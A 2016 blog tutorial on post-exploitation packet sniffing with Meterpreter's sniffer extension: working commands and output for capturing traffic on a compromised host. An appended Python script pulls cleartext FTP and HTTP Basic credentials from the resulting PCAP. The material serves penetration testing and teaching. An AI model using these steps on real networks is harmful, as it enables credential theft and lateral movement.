Monday, January 18, 2016

Packet Sniffing Metasploit with Meterpreter

Meterpreter can run a packet sniffer through its sniffer extension. Something very important is that the captured packets are held in memory on the target and never written to its hard drive; they are only turned into a PCAP file on the attacker side when you download them with sniffer_dump. I will explain how to enable the packet sniffer with Metasploit and Meterpreter:

Let's assume you already have a Meterpreter session on the target from whichever exploit you used. Then you type the following:

### Load the sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?


....

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface


### List the interfaces that can be sniffed, to pick the one carrying the traffic we want


meterpreter > sniffer_interfaces


1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )


### Interface 2 is the real NIC (the one that got its address by DHCP), so we start the capture on it:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)


### Stop the sniffer

The capture buffer holds 50000 packets, so check sniffer_stats while it runs and stop and dump before the buffer fills up.

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'


### Download the data as a PCAP (the conversion happens on the attacker side; nothing is written to the target's disk)

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap


Then I was able to open the file raul.pcap using Wireshark.

Summary

Where can you use this? When pentesting a network you can use it to grab credentials that are sent in cleartext (FTP, HTTP Basic auth, telnet and the like) and to find hosts and services to move laterally to, all from the compromised machine's point of view; it is also handy for troubleshooting a computer's network problems when you cannot install a capture tool on it.
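What to do with the PCAP once it is on the attacker box, as an added example that is not part of the original post: a Python 3 script (standard library only) that reads a classic libpcap file such as /root/raul.pcap and pulls plaintext FTP logins and HTTP Basic-auth credentials out of the TCP payloads. It does no TCP stream reassembly, so a credential split across two segments is missed; that is the trade-off for staying dependency-free. The traffic it runs on by default is constructed inline (the hosts 10.0.0.5, 10.0.0.21 and 10.0.0.80 and the credentials are made up); pass a real dump as the first argument.

```python
"""Extract cleartext FTP and HTTP Basic credentials from a libpcap capture.

Added example (not from the original post). The PCAP writer below only exists
to build constructed sample traffic so the script can run offline.
"""
import base64
import re
import struct
import sys

LINKTYPE_ETHERNET = 1
FTP_RE = re.compile(rb"^(USER|PASS) (.+?)\r?\n", re.M)
BASIC_RE = re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]+)", re.I)


def build_frame(src, dst, sport, dport, payload):
    """Constructed sample frame: Ethernet II + minimal IPv4 + TCP (no options, no checksums)."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # dummy MACs, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(src), bytes(dst))
    return eth + ip + tcp


def build_pcap(frames):
    """Classic (little-endian) libpcap file: 24-byte global header + 16-byte record headers."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1452000000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_packets(data):
    """Yield (src, dst, sport, dport, payload) for every IPv4/TCP frame in a classic PCAP."""
    magic, = struct.unpack("<I", data[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack(endian + "I", data[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                        # not IPv4
        ip = frame[14:]
        ip = ip[:struct.unpack("!H", ip[2:4])[0]]           # drop Ethernet padding
        if ip[9] != 6:
            continue                                        # not TCP
        ihl = (ip[0] & 0x0F) * 4
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        doff = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[doff:]


def extract_credentials(pcap_bytes):
    """Return [(protocol, client, server, credential)] found in plaintext payloads."""
    found = []
    ftp_user = {}                                           # last USER seen per (client, server)
    for src, dst, sport, dport, payload in iter_packets(pcap_bytes):
        if not payload:
            continue
        if dport == 21:                                     # client -> FTP server commands
            for cmd, arg in FTP_RE.findall(payload):
                arg = arg.decode(errors="replace")
                if cmd == b"USER":
                    ftp_user[(src, dst)] = arg
                else:
                    found.append(("ftp", src, dst, f"{ftp_user.get((src, dst), '?')}:{arg}"))
        for token in BASIC_RE.findall(payload):            # HTTP Basic on any port
            try:
                cred = base64.b64decode(token, validate=True).decode(errors="replace")
            except ValueError:                              # binascii.Error subclasses ValueError
                continue
            found.append(("http-basic", src, dst, cred))
    return found


def sample_capture():
    """Constructed traffic (made-up hosts and secrets): one FTP login, one HTTP Basic request."""
    client, ftp_srv, web_srv = (10, 0, 0, 5), (10, 0, 0, 21), (10, 0, 0, 80)
    return build_pcap([
        build_frame(client, ftp_srv, 40001, 21, b"USER raul\r\n"),
        build_frame(ftp_srv, client, 21, 40001, b"331 Please specify the password.\r\n"),
        build_frame(client, ftp_srv, 40001, 21, b"PASS s3cret\r\n"),
        build_frame(client, web_srv, 40002, 80,
                    b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                    + base64.b64encode(b"admin:hunter2") + b"\r\n\r\n"),
    ])


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_capture()
    for proto, src, dst, cred in extract_credentials(data):
        print(f"{proto:10} {src} -> {dst}  {cred}")
```

Run it as `python3 creds.py /root/raul.pcap` on a real dump; the same protocols can be eyeballed in Wireshark with display filters such as `ftp.request.command == "PASS"` or `http.authorization`.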
